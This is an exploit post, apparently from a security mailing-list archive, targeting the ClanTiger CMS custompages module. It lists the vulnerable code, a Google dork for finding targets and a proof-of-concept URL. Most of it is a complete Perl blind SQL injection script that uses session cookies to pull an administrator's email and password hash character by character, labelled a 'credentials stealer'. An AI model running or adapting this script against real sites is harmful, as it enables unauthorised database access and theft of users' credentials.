<<< Date Index >>>     <<< Thread Index >>>

CLAN TIGER CMS--(module custompage.php) BLIND SQL INJECTION-->



#!/usr/bin/perl
#
#-------------------------------------------------
# (module custompage.php) BLIND SQL INJECTION                        
#-------------------------------------------------
#
# CMS INFORMATION:                              
#
#-->WEB: http://www.clantiger.com
#-->DOWNLOAD: http://www.clantiger.com/download-clan-cms
#-->DEMO: http://www.demo.clantiger.com/
#-->CATEGORY: CMS / Portals
#-->DESCRIPTION: ClanTiger is a content management system specifically designed 
for gaiming
#               clans...
#
# CMS VULNERABILITY:
#            
#-->TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default)
#-->DORK: "Powered by ClanTiger"
#-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT
#-->AFFECT VERSION: LAST = 1.1.1 (1.1 too)
#-->Discovered Bug date: 2009-04-11
#-->Reported Bug date: 2009-04-11
#-->Fixed bug date: Not fixed
#-->Info patch (????): Not fixed
#-->Author: YEnH4ckEr
#-->mail: y3nh4ck3r[at]gmail[dot]com
#-->WEB/BLOG: N/A
#-->COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su 
apoyo.
#
#--------------
#BUG FILE:
#--------------
#
#Path --> [HOME_PATH]/modules/custompages.php
#
#It contents:
#
#       function main()
#       {
#               
#               ...
#
#               $page = new CustomPage();
#               $page->slug = $_GET['slug'];
#               $page->getBy(array('slug'));
#               
#               if(!$page->id)
#               {
#                       throw new cccException('The page you are looking for is 
currently                       unavailable. You may need to STOP! Hammertime. 
If School Is Out, You                    should try reloading this page.','Page 
not found');
#               }
#               
#               $tpl->define('title',$page->title);
#               $tpl->define('content',$page->content); // we allow HTML here, 
no safeoutput
#               
#               $this->pageDetails->setTitle($page->title);
#               $this->pageDetails->addKeyword($page->keywords);
#               $this->pageDetails->setDescription($page->description);
#               
#               $this->content = $tpl->publish();
#               $this->display();
#       }
#
#---------------
#CONDITIONS:
#---------------
#
#**DB_PREFIX="" (Default) 
#
#       maybe: db, db_clan, ...
#
#**Exist a custompage
#
#**gpc_magic_quotes=off
#
#------------------------------------------
#PROOF OF CONCEPT (BLIND SQL INJECTION):
#------------------------------------------
#
#[HOME_PATH]/modules/custompages.php?slug=the_custom_page' [BLIND SQL INJECTION]
#
#-------------
#EXAMPLE:
#-------------
#
#[HOME_PATH]/modules/custompages.php?slug=the_custom_page'%20AND%20((SELECT%20length(username)%20from%20members%20WHERE%20id=1)=5)%20/*
#
#Result: admin's username has 5 characters (maybe = admin? :P)
#
#*******************************************************************
# GREETZ TO: Str0ke, JosS and all spanish Hack3Rs community!
#*******************************************************************
#
use LWP::UserAgent;
use HTML::TreeBuilder 2.96;
#Subroutines
sub lw
{
        my $SO = $^O;
        my $linux = "";
        if (index(lc($SO),"win")!=-1){
                $linux="0";
        }else{
                $linux="1";
        }               
        if($linux){
                system("clear");
        }
        else{
                system("cls");
                system ("title Clan Tiger CMS (module custompages.php) BLIND 
SQL Injection Exploit");
                system ("color 02");
        }
}
sub request {
        my $cookie="CCC_LANG=en;"." CCC_UID=".$_[0]."; CCC_CODE=".$_[1].";";
        my $userag = LWP::UserAgent->new;
        $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
        my $request = HTTP::Request -> new(GET => $_[2]);
        $request->header(cookie => $cookie);
        my $outcode= $userag->request($request)->as_string;
        return $outcode;
}
sub helper {
        print "\n\t[**] Clan Tiger CMS - BLIND SQL Injection Exploit\n";
        print "\t[??] USAGE MODE: [??]\n";
        print "\t[**] perl $0 [HOST] [PATH] [uid] [code] [slug] [id] 
[DB_PREFIX]\n";
        print "\t[**] [HOST]: Web attacked.\n";
        print "\t[**] [PATH]: Home Path.\n";
        print "\t[**] [uid]: The CCC_UID cookie.\n";
        print "\t[**] [code]: The CCC_CODE cookie.\n";
        print "\t[**] [slug]: Title custompage.\n";
        print "\t[**] [id]: Exploiting id user. Default: 1 (**optional)\n";
        print "\t[**] [DB_PREFIX]: Global var needed. Default: null 
(**optional)\n";
        print "\t[**] Example: perl $0 www.example.es Clan-tiger-111 f717716... 
\n"; 
        print "\t[**] ...2e1a50db06c0f2fe8804885ac2c01390 namecustompage 1 
\"\"\n";
}
sub mail{
$output=&request($_[0],$_[1],$_[2]);
 my $root = HTML::TreeBuilder->new_from_content($output);
# source file
$email= $root->look_down('_tag','td','style','width: 70%');
print "\t-----------------------------------------------------------------\n";
print "\tMail captured!.Getting password hash. Wait for a moment...\n";
print "\t-----------------------------------------------------------------\n";
return $email -> as_text();
$root->delete();
}
sub password {
#Second password...
$j=1;
        $i=48;
        while(($j<=32) && ($i<=126)){
                my 
$finalrequest=$_[4]."'+AND+ascii(substring((SELECT+password+FROM+".$_[0]."members+WHERE+id=".$_[1]."),".$j.",1))=".$i."+/*";
                $output=&request($_[2],$_[3],$finalrequest);
                if ( $output =~ (/<title>/.$custompage))
                {
                        $pass=$pass.chr($i);
                        $j++;
                        $i=47;
                }
        if($i==57)
        {
                $i=96;
        }
#new char
        $i++; 
        }
#Error
        if(($i>127) || ($j>32)){
                if(!$pass){
                        print 
"\t-----------------------------------------------------------------\n";
                        print("\tEXPLOIT FAILED!\n");
                        print("\tFatal error: Datas doesn't find!\n");
                        print 
"\t-----------------------------------------------------------------\n";
                        exit(1);
                }
        }
return $pass;
}
#Main
&lw;
        print 
"\t\t#########################################################\n\n";
        print 
"\t\t#########################################################\n\n";
        print "\t\t##     Clan Tiger CMS - BLIND SQL Injection Exploit    
##\n\n";
        print "\t\t##    ++Conditions: Need a register user,a custompage  
##\n\n";
        print "\t\t##               and DB_PREFIX (default:null)          
##\n\n";
        print "\t\t##                    Author: Y3nh4ck3r                
##\n\n";
        print "\t\t##            Contact:y3nh4ck3r[at]gmail[dot]com       
##\n\n";
        print "\t\t##                    Proud to be Spanish!             
##\n\n";
        print 
"\t\t#########################################################\n\n";
        print 
"\t\t#########################################################\n\n";
#Init variables
        my $host=$ARGV[0];
        my $path=$ARGV[1];
        my $uid=$ARGV[2];
        my $code=$ARGV[3];
        my $custompage=$ARGV[4];
#Build the uri
        my 
$finalhost="http://".$host."/".$path."/index.php?module=custompages&slug=";;
        $finalhost=$finalhost.$custompage;
#Check all variables needed
$numArgs = $#ARGV + 1;
        if($numArgs<=4) 
        {
                &helper;
                exit(1);        
        }
#Id-user is optional.Default:1
        if(!$ARGV[5]){
                $idhack="1";    
        }else{
                $idhack=$ARGV[5];       
        }
        if(!$ARGV[6]){
                $db_prefix="";  
        }else{
                $db_prefix=$ARGV[6];    
        }
#Testing
my $finalrequest = $finalhost;
$output=&request($uid,$code,$finalrequest);
if ( $output =~ /<div class="title">Access denied<\/div>/)
{
        print 
"\t-----------------------------------------------------------------\n";
        print "\tYour credentials are not correct! This exploits need login.\n";
        print "\tOptions: [your-id-user],[your-password] incorrect.\n"; 
        print "\tExploit failed! No luck!\n";
        print 
"\t-----------------------------------------------------------------\n";
    exit(1);
}
if ( $output =~ /<div class="title">Page not found<\/div>/)
{
        print 
"\t-----------------------------------------------------------------\n";
        print "\tCustom page doesn't exist! Maybe no there on this server!\n";
        print "\tOption: [slug-get-var] incorrect.\n"; 
        print "\tExploit failed! No luck!\n";
        print 
"\t-----------------------------------------------------------------\n";
        exit(1);
}
if ( $output =~ (/<title>/.$custompage))
{
        print 
"\t-----------------------------------------------------------------\n";
        print "\tThis Web could be vulnerable!\n";
        print "\tThe custompage exists!\n";
        print "\tTesting Blind SQL Injection...\n"; 
        print 
"\t-----------------------------------------------------------------\n";
}else{ 
        print 
"\t-----------------------------------------------------------------\n";
        print "\tCustompage doesn't exist!\n";
        print "\tEXPLOIT FAILED!\n";
        print 
"\t-----------------------------------------------------------------\n";
exit(1); 
}       
#Test blind sql injection
my $finalrequest=$finalhost."'+AND+1=1+/*";
$output=&request($uid,$code,$finalrequest);
if ( $output =~ (/<title>/.$custompage))
{    
        print 
"\t-----------------------------------------------------------------\n";
        print "\tThis Web is really vulnerable!\n";
        print "\tTested Blind SQL Injection.\n";                
        print "\tChecking id user and DB_PREFIX null...\n"; 
        print 
"\t-----------------------------------------------------------------\n";
}else{ 
        print 
"\t-----------------------------------------------------------------\n";
        print "\tThis Web is not vulnerable (Maybe patched)!\n";
        print "\tEXPLOIT FAILED!\n";
        print 
"\t-----------------------------------------------------------------\n";
exit(1); 
}       
#Test if user exists and DB_PREFIX
my 
$finalrequest=$finalhost."'+AND+(SELECT+COUNT(*)+from+".$db_prefix."members+WHERE+id=".$idhack.")+/*";
$output=&request($uid,$code,$finalrequest);
if ( $output =~ (/<title>/.$custompage))
{    
        print 
"\t-----------------------------------------------------------------\n";
        print "\tOK...The user exists and DB_PREFIX is '".$db_prefix."'!\n";    
        
        print "\tStarting exploit...\n"; 
        print 
"\t-----------------------------------------------------------------\n";
        print "\tWait several minutes...\n"; 
        print 
"\t-----------------------------------------------------------------\n";
}else{ 
        print 
"\t-----------------------------------------------------------------\n";
        print "\tUser doesn't exists or DB_PREFIX not '".$db_prefix."'\n";      
        
        print "\tEXPLOIT FAILED!\n";
        print 
"\t-----------------------------------------------------------------\n";
exit(1); }      
#OK, now we get the mail user from web 
#i got it from blind sql but this method is faster and reduce time of injection
#First email...
my 
$hostmail="http://".$host."/".$path."/index.php?module=profiles&action=view&id=".$idhack;
$mail=&mail($uid,$code,$hostmail);
$passhash=&password($db_prefix,$idhack,$uid,$code,$finalhost);
print "\n\t\t*************************************************\n";
print "\t\t****  EXPLOIT EXECUTED (CREDENTIALS STEALER) ****\n";
print "\t\t*************************************************\n\n";
print "\t\tUser-id:".$idhack."\n";
print "\t\tUser-email:".$mail."\n";
print "\t\tUser-password(hash):".$passhash."\n\n";
print "\n\t\t----------------------FINISH!--------------------\n\n";
print "\t\t---------------Thanks to: y3hn4ck3r--------------\n\n";
print "\t\t------------------------EOF----------------------\n\n";
exit(1);
#Ok...all job done